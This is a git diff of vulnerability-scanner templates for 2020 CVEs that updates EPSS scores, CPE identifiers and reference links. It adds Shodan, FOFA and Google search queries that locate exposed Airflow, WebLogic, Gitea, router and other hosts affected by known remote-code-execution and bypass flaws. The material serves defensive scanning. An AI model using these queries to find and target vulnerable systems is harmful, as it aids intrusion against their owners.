a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 19b38da641..3a16c33146 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-11853 - epss-score: 0.82121 - epss-percentile: 0.98108 + epss-score: 0.83699 + epss-percentile: 0.98462 cpe: cpe:2.3:a:microfocus:operation_bridge_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 696fc8b18a..4dc5e625cc 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11854 cwe-id: CWE-798 - epss-score: 0.2548 - epss-percentile: 0.96589 + epss-score: 0.23333 + epss-percentile: 0.96551 cpe: cpe:2.3:a:microfocus:application_performance_management:9.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index e20b060b70..73f440dec6 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-11930 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.69031 + epss-percentile: 0.69597 cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,6 +28,8 @@ info: product: translate_wordpress_with_gtranslate framework: wordpress publicwww-query: "/wp-content/plugins/gtranslate" + shodan-query: http.html:/wp-content/plugins/gtranslate + fofa-query: body=/wp-content/plugins/gtranslate tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate http: diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 6ff8352739..101e15d16a 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-11978 cwe-id: CWE-78 - epss-score: 0.97425 - epss-percentile: 0.99933 + epss-score: 0.97444 + epss-percentile: 0.99947 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: apache product: airflow shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + fofa-query: title="sign in - airflow" + google-query: intitle:"sign in - airflow" tags: cve2020,cve,packetstorm,apache,airflow,rce,kev http: diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 4dc5e92986..a04b05015c 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -12,19 +12,22 @@ info: - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b - https://nvd.nist.gov/vuln/detail/CVE-2020-11991 - https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E + - https://github.com/ARPSyndicate/cvemon + - https://github.com/H4ckTh3W0r1d/Goby_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-11991 cwe-id: CWE-611 - epss-score: 0.81153 - epss-percentile: 0.98059 + epss-score: 0.81306 + epss-percentile: 0.98339 cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: cocoon shodan-query: http.html:"Apache Cocoon" + fofa-query: body="apache cocoon" tags: cve,cve2020,apache,xml,cocoon,xxe http: diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 2a3831aa1c..37371082c8 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-12054 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47553 + epss-percentile: 0.47703 cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index a0db01f9a6..4e1062166a 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -14,18 +14,22 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-12116 - https://www.manageengine.com/network-monitoring/help/read-me-complete.html - https://www.manageengine.com/network-monitoring/help/read-me-complete.html#125125 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12116 cwe-id: CWE-22 epss-score: 0.97317 - epss-percentile: 0.99861 + epss-percentile: 0.99876 cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: zohocorp product: manageengine_opmanager + shodan-query: http.title:"opmanager plus" + fofa-query: title="opmanager plus" + google-query: intitle:"opmanager plus" tags: cve,cve2020,zoho,lfi,manageengine,zohocorp http: diff --git a/http/cves/2020/CVE-2020-12124.yaml b/http/cves/2020/CVE-2020-12124.yaml index ba9549111b..4c41b1da66 100644 --- a/http/cves/2020/CVE-2020-12124.yaml +++ b/http/cves/2020/CVE-2020-12124.yaml @@ -16,13 +16,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12124 cwe-id: CWE-78 - epss-score: 0.9601 - epss-percentile: 0.99361 + epss-score: 0.94551 + epss-percentile: 0.99227 cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wavlink product: wn530h4_firmware + shodan-query: http.html:"wavlink" + fofa-query: body="wavlink" tags: cve,cve2020,rce,wavlink variables: str: "{{rand_base(3)}}" diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index f49348ba37..6706323876 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12127 cwe-id: CWE-306 - epss-score: 0.06293 - epss-percentile: 0.93458 + epss-score: 0.06164 + epss-percentile: 0.93545 cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: wavlink product: wn530h4_firmware shodan-query: http.html:"Wavlink" + fofa-query: body="wavlink" tags: cve,cve2020,wavlink,exposure http: diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index bf22dc4ca5..b07403baa8 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -26,6 +26,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,authenticated,xss http: diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml index 3026e1ed61..fcd1884b16 100644 --- a/http/cves/2020/CVE-2020-12259.yaml +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-12259 cwe-id: CWE-79 epss-score: 0.16256 - epss-percentile: 0.95859 + epss-percentile: 0.95985 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,6 +26,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2020,cve,rconfig,authenticated,xss http: diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index da5cb58c9e..bb9a8edcc2 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12478 cwe-id: CWE-306 - epss-score: 0.01186 - epss-percentile: 0.8478 + epss-score: 0.01338 + epss-percentile: 0.86048 cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: teampass product: teampass shodan-query: http.html:"teampass" + fofa-query: body="teampass" tags: cve2020,cve,teampass,exposure,unauth http: diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 876fe45ce4..e2af8fc0b1 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12720 cwe-id: CWE-306 - epss-score: 0.8836 - epss-percentile: 0.98614 + epss-score: 0.88621 + epss-percentile: 0.98693 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vbulletin product: vbulletin + google-query: intext:"powered by vbulletin" + shodan-query: http.title:"powered by vbulletin" + fofa-query: body="powered by vbulletin" tags: cve2020,cve,vbulletin,sqli,packetstorm http: diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index 0a7eb8a7b4..640c6ca27c 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -20,14 +20,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13117 cwe-id: CWE-77 - epss-score: 0.07866 - epss-percentile: 0.94083 - cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* + epss-score: 0.09416 + epss-percentile: 0.94709 + cpe: cpe:2.3:h:wavlink:wn575a4:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink - product: wn575a4_firmware + product: wn575a4 shodan-query: http.title:"Wi-Fi APP Login" tags: cve,cve2020,wavlink,rce,oast,router diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index cd7764f649..883a1ca735 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-13121 cwe-id: CWE-601 epss-score: 0.00235 - epss-percentile: 0.60944 + epss-percentile: 0.61592 cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index 758e2c7ab3..b476eca5c0 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: articatech product: artica_proxy + shodan-query: http.html:"artica" + fofa-query: body="artica" tags: cve,cve2020,artica,lfi,articatech http: diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 14361e187f..ba0ef6dbf0 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -14,13 +14,15 @@ info: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says - https://nvd.nist.gov/vuln/detail/CVE-2020-13167 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13167 cwe-id: CWE-78 - epss-score: 0.97405 - epss-percentile: 0.99917 + epss-score: 0.97432 + epss-percentile: 0.9994 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 9c8e3873f9..4400abd5e1 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-13258 cwe-id: CWE-79 epss-score: 0.00464 - epss-percentile: 0.7492 + epss-percentile: 0.75413 cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index b3e76eb97f..539fe48087 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.2 cve-id: CVE-2020-13379 cwe-id: CWE-918 - epss-score: 0.76934 - epss-percentile: 0.97935 + epss-score: 0.71681 + epss-percentile: 0.98063 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2020,cve,grafana,ssrf http: diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index cd153be8e7..1f48e0ba99 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -14,13 +14,15 @@ info: - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 - https://nvd.nist.gov/vuln/detail/CVE-2020-13405 + - https://github.com/merlinepedra/RHINOECURITY-CVEs + - https://github.com/mrnazu/CVE-2020-13405 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-13405 cwe-id: CWE-306 epss-score: 0.01002 - epss-percentile: 0.81964 + epss-percentile: 0.83607 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,7 @@ info: vendor: microweber product: microweber shodan-query: http.html:"microweber" + fofa-query: body="microweber" tags: cve,cve2020,microweber,unauth,disclosure http: diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 32a8729405..48c121e71d 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -21,12 +21,14 @@ info: cve-id: CVE-2020-13483 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.43845 + epss-percentile: 0.44743 cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: bitrix24 product: bitrix24 + shodan-query: http.html:"/bitrix/" + fofa-query: body="/bitrix/" tags: cve2020,cve,xss,bitrix,bitrix24 http: diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 041b88e439..6efcb4aba4 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13638 cwe-id: CWE-269 - epss-score: 0.39352 - epss-percentile: 0.97152 + epss-score: 0.3523 + epss-percentile: 0.97125 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,auth-bypass,intrusive variables: username: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 01d5fcd3e6..ac464c303a 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-13820 cwe-id: CWE-79 epss-score: 0.00289 - epss-percentile: 0.65704 + epss-percentile: 0.68885 cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: extremenetworks product: extreme_management_center shodan-query: title:"Extreme Management Center" + fofa-query: title="extreme management center" + google-query: intitle:"extreme management center" tags: cve2020,cve,xss,extremenetworks http: diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index fdaef27edb..49e673cb9c 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -25,6 +25,8 @@ info: vendor: pandorafms product: pandora_fms shodan-query: title:"Pandora FMS" + fofa-query: title="pandora fms" + google-query: intitle:"pandora fms" tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms http: diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 6a9e81b8b8..11a748d533 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13927 cwe-id: CWE-1188 - epss-score: 0.96246 - epss-percentile: 0.99489 + epss-score: 0.96667 + epss-percentile: 0.99637 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: apache product: airflow shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + fofa-query: title="sign in - airflow" + google-query: intitle:"sign in - airflow" tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev http: diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 1bf59caeaf..b6066bb5c7 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: apache product: kylin + shodan-query: http.favicon.hash:-186961397 + fofa-query: icon_hash=-186961397 tags: cve,cve2020,apache http: diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 33fa34e780..b38f01fd33 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: apache product: apisix + fofa-query: title="apache apisix dashboard" + shodan-query: http.title:"apache apisix dashboard" + google-query: intitle:"apache apisix dashboard" tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix http: diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 4f34dc02ce..036c2396dc 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2020-14144 cwe-id: CWE-78 - epss-score: 0.97181 - epss-percentile: 0.99775 + epss-score: 0.97279 + epss-percentile: 0.9986 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: gitea product: gitea shodan-query: html:"Powered by Gitea Version" + fofa-query: body="powered by gitea version" + google-query: intitle:"gitea" tags: cve2020,cve,rce,gitea,authenticated,git,intrusive http: diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index bec6f00fa4..643a09d2cc 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -12,12 +12,15 @@ info: reference: - https://jira.atlassian.com/browse/JRASERVER-71536 - https://nvd.nist.gov/vuln/detail/CVE-2020-14179 + - https://github.com/developer3000S/PoC-in-GitHub + - https://github.com/hackerhackrat/R-poc + - https://github.com/soosmile/POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-14179 - epss-score: 0.00927 - epss-percentile: 0.81211 + epss-score: 0.00628 + epss-percentile: 0.78972 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 42ab97f610..030185bfaa 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-14181 cwe-id: CWE-200 - epss-score: 0.95919 - epss-percentile: 0.99412 + epss-score: 0.9645 + epss-percentile: 0.99579 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 2f1c79e2ee..252fc0ba2b 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2020-14408 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44682 + epss-percentile: 0.44743 cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: agentejo product: cockpit + shodan-query: http.favicon.hash:688609340 + fofa-query: icon_hash=688609340 tags: cve2020,cve,cockpit,agentejo,xss,oss http: diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 09e1f8fbdc..aacefbd84b 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-14413 cwe-id: CWE-79 epss-score: 0.00095 - epss-percentile: 0.38971 + epss-percentile: 0.40142 cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index fc9e6d83c2..3dff27eb2f 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -20,7 +20,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14750 - epss-score: 0.97544 + epss-score: 0.97546 epss-percentile: 0.99996 cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* metadata: @@ -29,6 +29,8 @@ info: vendor: oracle product: fusion_middleware shodan-query: http.html:"Weblogic Application Server" + fofa-query: title="weblogic" + google-query: intitle:"weblogic" tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm http: diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 4d4bbdc9cc..012e341c56 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: oracle product: business_intelligence + shodan-query: http.title:"oracle business intelligence sign in" + fofa-query: title="oracle business intelligence sign in" + google-query: intitle:"oracle business intelligence sign in" tags: cve,cve2020,oracle,lfi,kev,packetstorm http: diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 6e39666c78..834d6545f8 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve2020,cve,oracle,rce,weblogic,oast,kev http: diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index fff3e57f34..2241d75bda 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -29,6 +29,8 @@ info: vendor: oracle product: weblogic_server shodan-query: title:"Oracle PeopleSoft Sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm variables: str: "{{randstr}}" diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index 08bc9bcdfe..beaf75cc9a 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: traefik product: traefik + shodan-query: http.title:"traefik" + fofa-query: title="traefik" + google-query: intitle:"traefik" tags: cve,cve2020,traefik,redirect http: diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 07a32b99f6..707a430ff8 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -19,8 +19,8 @@ info: cvss-score: 10 cve-id: CVE-2020-15148 cwe-id: CWE-502 - epss-score: 0.02081 - epss-percentile: 0.88831 + epss-score: 0.02822 + epss-percentile: 0.90667 cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 475027a52c..5c04ab91bf 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-15227 cwe-id: CWE-94,CWE-74 epss-score: 0.97285 - epss-percentile: 0.99849 + epss-percentile: 0.99862 cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index aedccf7477..424e6c8506 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -13,13 +13,15 @@ info: - https://github.com/maptiler/tileserver-gl/issues/461 - http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2020-15500 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-15500 cwe-id: CWE-79 - epss-score: 0.0021 - epss-percentile: 0.58865 + epss-score: 0.00382 + epss-percentile: 0.72931 cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index 7746f95cf6..e7033cf92c 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -27,6 +27,7 @@ info: max-request: 2 vendor: terra-master product: tos + fofa-query: '"terramaster" && header="tos"' tags: cve2020,cve,terramaster,rce,terra-master variables: filename: "{{to_lower(rand_text_alpha(4))}}" diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 95dd9b282a..9534ddc51c 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -27,6 +27,9 @@ info: max-request: 7 vendor: gogs product: gogs + google-query: intitle:"sign in - gogs" + shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + fofa-query: title="sign in - gogs" tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive http: diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index f394848dde..949f9cbb72 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2020-15895 cwe-id: CWE-79 epss-score: 0.00187 - epss-percentile: 0.55045 + epss-percentile: 0.55848 cpe: cpe:2.3:o:dlink:dir-816l_firmware:2.06:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink product: dir-816l_firmware shodan-query: html:"DIR-816L" + fofa-query: body="dir-816l" tags: cve2020,cve,dlink,xss http: diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index 52aa5efd76..d049f9e6f5 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-16139 - epss-score: 0.06015 - epss-percentile: 0.93331 + epss-score: 0.05724 + epss-percentile: 0.93341 cpe: 